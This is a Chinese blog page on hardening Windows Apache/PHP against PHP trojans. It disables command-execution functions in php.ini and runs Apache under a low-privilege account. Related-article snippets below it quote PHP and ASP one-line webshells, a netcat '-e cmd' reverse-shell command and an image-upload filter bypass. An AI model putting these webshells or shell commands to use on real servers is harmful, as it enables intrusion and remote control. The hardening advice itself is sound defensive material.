Windows Apache 下防 PHP 木马设置

最新推荐文章于 2019-08-12 09:31:36 发布
最新推荐文章于 2019-08-12 09:31:36 发布
阅读量1.8k 收藏 1
点赞数
文章标签: apache windows php system shell 浏览器

一、强化PHP环境
第一步:打开php.ini文件(windows默认路径为”%systemroot%/php.ini”,linux默认路径在”etc/php.ini”).
第二步:找到”safe_mode=off”改为”safe_mode=on”(已经打开的省略此步)
第三步:找到”disable_functions=”改为:”disable_functions=phpinfo,system,exec,passthru,shell_exec,popen,is_dir”.
,”system,exec,passthru,shell_exec,popen,” 这些属于命令执行类函数,关闭他们可以防止PHP木马执行webshell;”is_dir”这个函数的关闭,可以让既使有everyone可读的权限,也无法将服务器目录及文件名返回到浏览器.
第四步:找到”display_errors=on”改为”display_errors=off”
第五步:保存退出.

二、降低Apache权限
第一步:另外为apche系统开设一个用户,
net user apache fuckmicrosoft /add
net localgroup users apache /del
ok.我们建立了一个不属于任何组的用户apche
打开计算机管理器,选服务,点apache服务的属性,我们选择log on,选择this account,我们填入上面所建立的账户和密码,重启apache服务,ok,apache运行在低权限下了。
第二步:把所有分区的安全选项里的授权组或用户里除了administrators和system全都删除,针对每个虚拟主机用户目录再单加一个ev-eryone读,写,和列出目录权限

cnbird2008
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Windows下IIS6/Apache2.2.4+MySQL5.2+PHP5.2.1安装配置方法
01-20
现在算起我真正从写第一个php的WEB开始距今还是有三四个月了,用工作之余正在进行www.kuomart.com网站的写做,回想当初一直用的是Windows2003+IIS6+PHP5.0.7+MYSQL4.1在进行开发,直到昨天机子重了木马,Kav也没查出...
Apache解析漏洞以及常用防御方法
qq_29566629的博客
02-22 639
漏洞原理: Apache是从右到左开始判断解析,如果为不可识别解析,就再往左判断。比如xxx.php.rar对apache来说rar是不可解析的,所以就会解析成xxx.php 复现: 新建一个1.php.rar文件,用记事本打开,写入PHP一句话木马: 上传成功后直接访问可以执行代码: 如何防御: 对apache的配置文件做适当修改,在文件中添加下面几行代码 <FilesMatch “.(php.|php3.|php4.|php5.)”> Order Deny,Allow Deny fro
黑客通过linux bash漏洞借助apache cgi向产品服务器植入木马病毒的实例分享!
sidongxue2的专栏
01-24 4126
黑客通过linux bash漏洞借助apache cgi向产品服务器植入木马病毒的实例分享!
网站服务器如何有效防御PHP木马攻击
letian003的专栏
03-24 485
摘要:我们可以通过设置各个文件夹的权限,来让apache用户只能执行我们想让它能干的事情。本文将介绍网站服务器如何有效防御PHP木马攻击? 1、防止跳出web目录首先修改httpd.conf,如果你只允许你的php脚本程序在web目录里操作,还可以修改httpd.conf文件限制php的操作路径。比如你的web目录是/usr/local/apache/htdocs,那么在htt
Apache 网站漏洞利用与安全防护修复方案
网站安全专家
08-12 1091
apache最近爆出的漏洞越来越多,旗下的solr产品存在远程服务器执行恶意代码漏洞,该漏洞产生的主要原因是因为apache dataimporthandler数据外部收集的一个端口模块,该模块支持从远程的地址进行通信,并多数据进行收集,正因为开放了远程地址,可导致攻击者构造恶意的代码对DIH进行脚本注入,从而让后端服务器对恶意代码进行了执行,该漏洞可导致服务器被攻击,被入侵,关于该漏洞的详情我们...
PHP云人才招聘系统V4.6.1商业授权版
03-01
安全重点:data目录为各类文件上传目录(头像 广告等),关闭该目录的执行权限可以有效防范大部分上传木马攻击。 语言及数据库支撑环境要求 * 可用的 web 服务器(如 Apache、Zeus、IIS 等) * PHP5.x及以上(支持...
易优cms企业建站系统
04-06
服务器:Linux/Windows/Apache 【推荐linux/apachePHP版本:5.4以上 【推荐5.4~5.6】 MYSQL版本:5.0以上 【推荐5.5+】 【虚拟空间推荐】 阿里云虚拟空间【首选】 百度云虚拟空间 西部数据建站主机 注意:必须...
Aimee Mini Server v1.0 beta
11-02
Aimee Mini Server是一款Aimee特制的绿色精简PHP服务器里面包含(Windows+Apache+MySQL+PHP)服务端程序,使用本工具可以非常方便的搭建网站服务器。 一键快速安装PHP+MYSQL+APACHE本地服务器环境,基于...
华盾服务器管理专家 3.0.3.78.rar
07-17
防盗链、防SQL注入、防网页木马、文件限制等安全功能全都有;强制广告通知下发、备案管理、非法信息检测,网站管理起来终于变得方便;硬盘占用、在线重启IIS、在线重启服务器、进程查看、网络连接查看、系统服务查看...
刚看到的apache的漏洞,可怕呀!!!
北极光的博客
09-10 2172
应该是我孤陋了,刚看到了一个apache的漏洞,上传一个***.php.***的文件,可以被当作.php来执行,可以试一下,写入:,存成123.php.rar,然后在地址栏输入文件名,显示出来的真的是“hello”,我晕!木马文件轻而易举的就伪装了,太可怕了!       对上传的文件做检查吧,还有个比较偷懒的方法,就是在.htaccess里临时禁止一下吧,在.htaccess里写入:  
【应急响应】驱动人生供应链木马攻击2019.1.30变种木马分析
Fly_鹏程万里
03-01 4276
360安全大脑监测到通过”驱动人生”供应链攻击传播的挖矿木马在1月30日下午4时左右再次更新…… 0x00 事件背景 360安全大脑监测到通过”驱动人生”供应链攻击传播的挖矿木马在1月30日下午4时左右再次更新。此次更新中,木马在此前抓取系统帐户密码的基础上增加了抓取密码hash值的功能,并试图通过pass the hash攻击进行横向渗透,使得该木马的传播能力进一步加强,即使是有高强度口令的...
绕过图片格式限制上传木马获取WebShell
dieman0446的博客
07-11 3463
思路:   图片上传功能中,前端页面上传的是.png格式的图片文件,但是抓包Request中修改图片后缀为.php 可以绕过对上传文件格式的限制,文件的上传路径可以在上传后的页面或查看上传成功后的response中有显示, 记录下来后用菜刀连接即可。 (1)网站要求上传png格式的文件 (2)保存-抓包,将文件后缀.png删除,剩余.php文件继续提交,提示成功。 ...
禁用eval函数
weixin_44706754的博客
04-19 2601
PHP 4, PHP 5, PHP 7) 无论是linux服务器还是windows服务器,eval命令是非常危险的 一、如何禁用eval命令 在php.ini中这样设置disable_functions =eval是无法禁用eval的,根据php手册说明,eval是一个语言构造器而不是一个函数。如果要禁用eval,则需要第三方扩展,使用Suhosin linux下suhosin的安装: wg...
PHP中的危险函数全解析
★昔梦无痕★
08-12 1320
在编译 PHP 时,如无特殊需要,一定禁止编译生成 CLI 命令行模式的 PHP 解析支持。可在编译时使用 –disable-CLI。一旦编译生成 CLI 模式的PHP,则可能会被入侵者利用该程序建立一个WEB Shell 后门进程或通过PHP 执行任意代码。phpinfo()功能描述:输出 PHP 环境信息以及相关的模块、WEB 环境等信息。危险等级:中passthru()功
PHP中eval函数的危害与正确禁用方法
代码技巧
12-13 5128
php的eval函数并不是系统组件函数,因此我们在php.ini中使用disable_functions是无法禁止它的。但是eval()对于php安全来说具有很大的杀伤力,因此一般不用的情况下为了防止类似如下的一句话木马入侵,需要禁止!php eval($_POST[cmd]);?>eval()使用范例:php$string = '杯子';$name = '咖啡';$str = '这个 $stri
如何防止PHP木马攻击
小迷童
10-09 1385
如题,现在好多木马php编写的,木马通过修改web目录下的文件来攻击系统;通过php执行shell来攻击服务器等等,作为系统架构者对系统或服务器如何架构来防止类似的情况发生呢? 1、防止跳出web目录   首先修改httpd.conf,如果你只允许你的php脚本程序在web目录里操作,还可以修改httpd.conf文件限制php的操作路径。比如你的web目录是/usr/local
windows下面常用的***测试命令
weixin_34354173的博客
08-21 284
echo ^<%eval request(“#”)%^> >C:\wmpub\hkfe666\h4ck.asp Md hack 创建hack文件夹 本地nc -vv -p -l 端口服务器nc路径 -e cmd路径 ip 端口 Rd hack 删除hack文件夹 Type d:\wwwroot\hack.asp 查看一句话*...
windows安装apache php mysql
最新发布
04-26
2. 下载 PHPWindows 版本,解压缩并将解压缩后的文件夹复制到 Apache 服务器的 "htdocs" 目录下。 3. 打开 Apache 服务器的配置文件("httpd.conf"),将以下几行代码添加到文件末尾: LoadModule ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值